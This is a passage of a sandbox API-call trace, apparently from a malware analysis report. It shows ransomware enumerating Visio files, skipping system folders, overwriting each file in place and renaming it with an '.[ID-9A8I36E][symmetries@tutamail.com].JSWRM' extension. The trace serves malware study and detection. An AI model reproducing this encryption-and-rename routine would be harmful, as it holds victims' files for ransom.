ftCreationTime.dwLowDateTime=0x1ec2a6a, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1ec2a6a, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1ee8cf4, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xfb1f, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEQUAL_VISIO2013_M.VSSX", cAlternateFileName="EEQUAL~2.VSS")) returned 1 [0148.103] lstrcmpiW (lpString1="EEQUAL_VISIO2013_M.VSSX", lpString2=".") returned 1 [0148.103] lstrcmpiW (lpString1="EEQUAL_VISIO2013_M.VSSX", lpString2="..") returned 1 [0148.103] lstrcmpiW (lpString1="EEQUAL_VISIO2013_M.VSSX", lpString2="...") returned 1 [0148.103] lstrcmpiW (lpString1="EEQUAL_VISIO2013_M.VSSX", lpString2="windows") returned -1 [0148.103] lstrcmpiW (lpString1="EEQUAL_VISIO2013_M.VSSX", lpString2="recovery") returned -1 [0148.103] lstrcmpiW (lpString1="EEQUAL_VISIO2013_M.VSSX", lpString2="perflogs") returned -1 [0148.103] lstrcmpiW (lpString1="EEQUAL_VISIO2013_M.VSSX", lpString2="documents and settings") returned 1 [0148.103] lstrcmpiW (lpString1="EEQUAL_VISIO2013_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.103] lstrcmpiW (lpString1="EEQUAL_VISIO2013_M.VSSX", lpString2="system volume information") returned -1 [0148.103] lstrcmpiW (lpString1="EEQUAL_VISIO2013_M.VSSX", lpString2="msocache") returned -1 [0148.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEQUAL_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEQUAL_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x241178, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEQUAL_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 23 [0148.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEQUAL_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEQUAL_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEQUAL_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 23 [0148.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEQUAL_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eequal_visio2013_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.104] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=64287) returned 1 [0148.104] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.105] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xfb10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xfb10, lpOverlapped=0x0) returned 1 [0148.110] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.110] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xfb10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xfb10, lpOverlapped=0x0) returned 1 [0148.111] CloseHandle (hObject=0x314) returned 1 [0148.111] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEQUAL_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eequal_visio2013_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEQUAL_VISIO2013_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eequal_visio2013_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.112] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x32e07e4, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x32e07e4, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x32e07e4, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xf17c, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEQUAL_VISIO2013_U.VSSX", cAlternateFileName="EEQUAL~3.VSS")) returned 1 [0148.112] lstrcmpiW (lpString1="EEQUAL_VISIO2013_U.VSSX", lpString2=".") returned 1 [0148.112] lstrcmpiW (lpString1="EEQUAL_VISIO2013_U.VSSX", lpString2="..") returned 1 [0148.112] lstrcmpiW (lpString1="EEQUAL_VISIO2013_U.VSSX", lpString2="...") returned 1 [0148.112] lstrcmpiW (lpString1="EEQUAL_VISIO2013_U.VSSX", lpString2="windows") returned -1 [0148.112] lstrcmpiW (lpString1="EEQUAL_VISIO2013_U.VSSX", lpString2="recovery") returned -1 [0148.112] lstrcmpiW (lpString1="EEQUAL_VISIO2013_U.VSSX", lpString2="perflogs") returned -1 [0148.112] lstrcmpiW (lpString1="EEQUAL_VISIO2013_U.VSSX", lpString2="documents and settings") returned 1 [0148.112] lstrcmpiW (lpString1="EEQUAL_VISIO2013_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.112] lstrcmpiW (lpString1="EEQUAL_VISIO2013_U.VSSX", lpString2="system volume information") returned -1 [0148.112] lstrcmpiW (lpString1="EEQUAL_VISIO2013_U.VSSX", lpString2="msocache") returned -1 [0148.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEQUAL_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEQUAL_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEQUAL_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 23 [0148.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEQUAL_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEQUAL_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x241100, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEQUAL_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 23 [0148.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEQUAL_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eequal_visio2013_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.113] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=61820) returned 1 [0148.113] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.114] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xf170, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xf170, lpOverlapped=0x0) returned 1 [0148.119] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.119] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xf170, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xf170, lpOverlapped=0x0) returned 1 [0148.120] CloseHandle (hObject=0x314) returned 1 [0148.120] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEQUAL_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eequal_visio2013_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEQUAL_VISIO2013_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eequal_visio2013_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.121] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1729263, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1729263, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x18ccc9d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x27da7, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EESEMI_M.VSSX", cAlternateFileName="EESEMI~2.VSS")) returned 1 [0148.121] lstrcmpiW (lpString1="EESEMI_M.VSSX", lpString2=".") returned 1 [0148.121] lstrcmpiW (lpString1="EESEMI_M.VSSX", lpString2="..") returned 1 [0148.121] lstrcmpiW (lpString1="EESEMI_M.VSSX", lpString2="...") returned 1 [0148.121] lstrcmpiW (lpString1="EESEMI_M.VSSX", lpString2="windows") returned -1 [0148.121] lstrcmpiW (lpString1="EESEMI_M.VSSX", lpString2="recovery") returned -1 [0148.121] lstrcmpiW (lpString1="EESEMI_M.VSSX", lpString2="perflogs") returned -1 [0148.121] lstrcmpiW (lpString1="EESEMI_M.VSSX", lpString2="documents and settings") returned 1 [0148.121] lstrcmpiW (lpString1="EESEMI_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.121] lstrcmpiW (lpString1="EESEMI_M.VSSX", lpString2="system volume information") returned -1 [0148.121] lstrcmpiW (lpString1="EESEMI_M.VSSX", lpString2="msocache") returned -1 [0148.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESEMI_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESEMI_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESEMI_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESEMI_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESEMI_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESEMI_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESEMI_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesemi_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.122] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=163239) returned 1 [0148.122] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.123] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0148.166] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.166] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0148.166] CloseHandle (hObject=0x314) returned 1 [0148.166] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESEMI_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesemi_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESEMI_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesemi_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.168] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b2f0f8, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1b2f0f8, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1b553ef, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x26fdb, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EESEMI_U.VSSX", cAlternateFileName="EESEMI~3.VSS")) returned 1 [0148.168] lstrcmpiW (lpString1="EESEMI_U.VSSX", lpString2=".") returned 1 [0148.168] lstrcmpiW (lpString1="EESEMI_U.VSSX", lpString2="..") returned 1 [0148.168] lstrcmpiW (lpString1="EESEMI_U.VSSX", lpString2="...") returned 1 [0148.168] lstrcmpiW (lpString1="EESEMI_U.VSSX", lpString2="windows") returned -1 [0148.168] lstrcmpiW (lpString1="EESEMI_U.VSSX", lpString2="recovery") returned -1 [0148.168] lstrcmpiW (lpString1="EESEMI_U.VSSX", lpString2="perflogs") returned -1 [0148.168] lstrcmpiW (lpString1="EESEMI_U.VSSX", lpString2="documents and settings") returned 1 [0148.168] lstrcmpiW (lpString1="EESEMI_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.168] lstrcmpiW (lpString1="EESEMI_U.VSSX", lpString2="system volume information") returned -1 [0148.168] lstrcmpiW (lpString1="EESEMI_U.VSSX", lpString2="msocache") returned -1 [0148.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESEMI_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESEMI_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESEMI_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESEMI_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESEMI_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESEMI_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESEMI_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesemi_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.169] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=159707) returned 1 [0148.169] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.170] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x26fd0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x26fd0, lpOverlapped=0x0) returned 1 [0148.181] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.181] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x26fd0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x26fd0, lpOverlapped=0x0) returned 1 [0148.181] CloseHandle (hObject=0x314) returned 1 [0148.181] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESEMI_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesemi_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESEMI_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesemi_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.183] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x318928f, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x318928f, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x318928f, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x15e9c, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EESEMI_VISIO2013_M.VSSX", cAlternateFileName="EESEMI~4.VSS")) returned 1 [0148.183] lstrcmpiW (lpString1="EESEMI_VISIO2013_M.VSSX", lpString2=".") returned 1 [0148.183] lstrcmpiW (lpString1="EESEMI_VISIO2013_M.VSSX", lpString2="..") returned 1 [0148.183] lstrcmpiW (lpString1="EESEMI_VISIO2013_M.VSSX", lpString2="...") returned 1 [0148.183] lstrcmpiW (lpString1="EESEMI_VISIO2013_M.VSSX", lpString2="windows") returned -1 [0148.183] lstrcmpiW (lpString1="EESEMI_VISIO2013_M.VSSX", lpString2="recovery") returned -1 [0148.183] lstrcmpiW (lpString1="EESEMI_VISIO2013_M.VSSX", lpString2="perflogs") returned -1 [0148.183] lstrcmpiW (lpString1="EESEMI_VISIO2013_M.VSSX", lpString2="documents and settings") returned 1 [0148.183] lstrcmpiW (lpString1="EESEMI_VISIO2013_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.183] lstrcmpiW (lpString1="EESEMI_VISIO2013_M.VSSX", lpString2="system volume information") returned -1 [0148.183] lstrcmpiW (lpString1="EESEMI_VISIO2013_M.VSSX", lpString2="msocache") returned -1 [0148.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESEMI_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESEMI_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x241100, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESEMI_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 23 [0148.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESEMI_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESEMI_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x240f70, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESEMI_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 23 [0148.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESEMI_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesemi_visio2013_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.184] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=89756) returned 1 [0148.184] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.184] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x15e90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x15e90, lpOverlapped=0x0) returned 1 [0148.191] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.191] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x15e90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x15e90, lpOverlapped=0x0) returned 1 [0148.192] CloseHandle (hObject=0x314) returned 1 [0148.192] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESEMI_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesemi_visio2013_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESEMI_VISIO2013_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesemi_visio2013_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.193] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16908c8, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x16908c8, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x16908c8, 